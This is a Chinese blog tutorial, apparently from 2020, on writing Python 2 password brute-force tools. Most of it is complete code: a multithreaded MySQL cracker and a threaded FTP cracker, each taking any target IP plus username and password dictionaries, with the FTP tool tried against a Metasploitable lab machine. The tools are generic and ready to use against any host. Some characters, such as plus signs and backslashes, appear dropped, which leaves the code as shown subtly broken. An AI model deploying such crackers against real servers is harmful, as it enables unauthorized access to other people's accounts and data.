Python开发爆破工具

2020-01-17 12:08:46 浏览数 (1)

上一篇讲到了如何用Python开发字典,而当我们手里有了字典

就可以进一步去做爆破的任务了,可以用现成的工具,当然也可以自己写

接下来我就要一步一步来写爆破工具!

爆破MySQL:

想要爆破MySQL目标至少要允许远程连接

我这里没有开启远程连接,只是爆破本地的MySQL

实际上,如果掌握了如何爆破本地MySQL,那么想要远程爆破MySQL也是很轻松的

最基本的实现:

代码语言:javascript复制
# -*-coding:utf-8 -*-
import pymysql

mysql_username = ('root', 'test', 'admin', 'user')
mysql_password = ('', '123456', 'test', 'root', 'admin', 'xuyiqing', 'user')

success = False
host = "127.0.0.1"
port = 3306

for username in mysql_username:
    for password in mysql_password:
        try:
            db = pymysql.connect(host, username, password)
            success = True
            if success:
                print "用户名:"   username   " 密码:"   password   " 破解成功"
        except Exception, e:
            print "用户名:"   username   " 密码:"   password   " 破解失败"
            pass

固定好哪些用户名和哪些密码,以及爆破的IP和端口,直接执行即可

进阶的MySQL爆破脚本:写的很完整,支持多线程

代码语言:javascript复制
# -*-coding:utf-8 -*-
"""
MySQL爆破脚本
用法:
python MysqlCrack2.py -H [目标IP] --u [用户字典] --p [密码字典] -P [端口]
"""
import re
import socket
import optparse
import threading

try:
    import pymysql
except ImportError:
    print "[!] You need to install pymysql module!"
    print "[!] Usage:pip install pymysql"
    exit()

result_user = None
result_pass = None
threads = []


def main():
    """
    处理输入参数
    :return:None
    """
    print "Welcome to MysqlCrack2"
    print "Author: Xuyiqing  Version:1.0"
    parse = optparse.OptionParser(
        'python %prog -H <target host> --u <users dictionary> --p <password dictionary> -P <port>')
    parse.add_option('-H', dest="target_host", type="string", help='specify the host')
    parse.add_option('--u', dest='user_dic', type='string', help='specify the dictionary for user')
    parse.add_option('--p', dest='pwd_dic', type='string', help='specify the dictionary for passwords')
    parse.add_option('-P', dest='port', type='int', help='specify the port')
    (options, args) = parse.parse_args()
    target_host = options.target_host
    user_dic = options.user_dic
    pwd_dic = options.pwd_dic
    port = options.port
    if target_host is not None and re.match(r'd{1,3}.d{1,3}.d{1,3}.d{1,3}', target_host):
        mysql_brute(target_host, user_dic, pwd_dic, port)
    else:
        print "[!] Unknown IPn"
        exit()


def mysql_brute(host, user_dic, pwd_dic, port):
    """
    MySQL暴力破解
    :param host: 主机
    :param user_dic: 用户字典
    :param pwd_dic: 密码字典
    :param port: 端口
    :return: None
    """
    print "[*] Target:"   host
    print "[*] Start cracking"
    userlist = None
    pwdlist = None
    try:
        socket.gethostbyname(host)
    except Exception:
        print '[*] Cannot connect to %s' % host
        exit()
    try:
        userlist = [i.strip('n') for i in open(user_dic, 'r').readlines()]
        pwdlist = [j.strip('n') for j in open(pwd_dic, 'r').readlines()]
        print "[*] Number of users:"   str(len(userlist))
        print "[*] Number of passwords:"   str(len(pwdlist))
    except Exception:
        print "[!] The path of the dictionary file is incorrect"
        exit()
    global threads
    for user in userlist:
        for pwd in pwdlist:
            t = threading.Thread(target=mysql_login, args=(host, user, pwd, port))
            t.start()
            threads.append(t)


def mysql_login(host, username, password, port):
    """
    MySQL连接
    :param host:主机
    :param username:用户名
    :param password: 密码
    :param port: 端口
    :return: None
    """
    try:
        db = pymysql.Connect(host=host, port=port, user=username, passwd=password)
        print "[ ] Success! User:"   username   " Password:"   password   "n"
        global result_user, result_pass
        result_user = username
        result_pass = password
        db.close()
        exit()
    except Exception:
        print "[-] Fail! User:"   username   " Password:"   password   "n"


if __name__ == '__main__':
    main()
    for thread in threads:
        thread.join()
    if result_user is not None and result_pass is not None:
        print "[ ] Result: %s - %s" % (result_user, result_pass)
    if result_user is None and result_pass is None:
        print "[ ] Crack Fail"

FTP破解工具开发:

实际去安装一些FTP软件比较困难,我这里就用Metasploitable Linux

启动后默认开启FTP服务,我这里的IP是192.168.232.129

Metaploitable Linux的FTP可以匿名登陆,并且已知一个账号密码为:msfadmin-msfadmin

代码语言:javascript复制
# -*-coding:utf-8 -*-
import optparse
import ftplib
import threading
import socket


def anony_login(host):
    """
    FTP匿名登陆
    :param host:主机
    :return: None
    """
    try:
        ftp = ftplib.FTP(host)
        ftp.connect(host, 21, timeout=10)
        ftp.login('anonymous', 'test@qq.com')
        ftp.retrlines('LIST')
        ftp.quit()
        print "n[*]"   str(host)   " FTP Anonymous Login Success"
    except Exception:
        print "n[-]"   str(host)   " FTP Anonymous Login Fail"


def ftp_login(host, username, password):
    """
    尝试用户密码登陆FTP
    :param host:主机
    :param username:用户名
    :param password:密码
    :return:None
    """
    try:
        print "[-] Trying: "   username   "-"   password   "n"
        ftp = ftplib.FTP(host)
        ftp.connect(host, 21, timeout=10)
        ftp.login(username, password)
        ftp.retrlines("LIST")
        ftp.quit()
        print "Success! "   username   " - "   password
    except ftplib.all_errors:
        pass


def brute_force(host, users_file, pwds_file):
    """
    暴力破解
    :param host: 主机
    :param users_file:用户字典
    :param pwds_file: 密码字典
    :return: None
    """
    users_f = open(users_file, 'r')
    pwds_f = open(pwds_file, 'r')
    for user in users_f.readlines():
        pwds_f.seek(0)
        for password in pwds_f.readlines():
            username = user.strip('n')
            password = password.strip('n')
            t = threading.Thread(target=ftp_login, args=(host, username, password))
            t.start()


def main():
    """
    主函数,处理输入参数
    :return:None
    """
    parser = optparse.OptionParser('usage%prog -H <target host> -u <users dictionary> -p <password dictionary>')
    parser.add_option('-H', dest='target_host', type='string', help='specify the host')
    parser.add_option('-u', dest='user_dic', type='string', help='specify the dictionary for user')
    parser.add_option('-p', dest='pwd_dic', type='string', help='specify the dictionary for passwords')
    (options, args) = parser.parse_args()
    host = options.target_host
    user_dic = options.user_dic
    pwd_dic = options.pwd_dic
    try:
        socket.gethostbyname(host)
    except Exception:
        print '[*] Cannot Resolve %s Unknown host' % host
        exit()
    anony_login(host)
    brute_force(host, user_dic, pwd_dic)


if __name__ == '__main__':
    main()

使用的话,需要两个字典:用户字典和密码字典,我随便加入一些东西

username.txt

代码语言:javascript复制
root
user
admin
msfadmin
manager

password.txt

代码语言:javascript复制
pwd
password
userpass
msfadmin
manager
123456

实际使用:-H 输入IP -u 用户名字典 -p 密码字典

结果:上边已经找到匿名登陆,还有下图的msfadmin,说明破解成功了

0 人点赞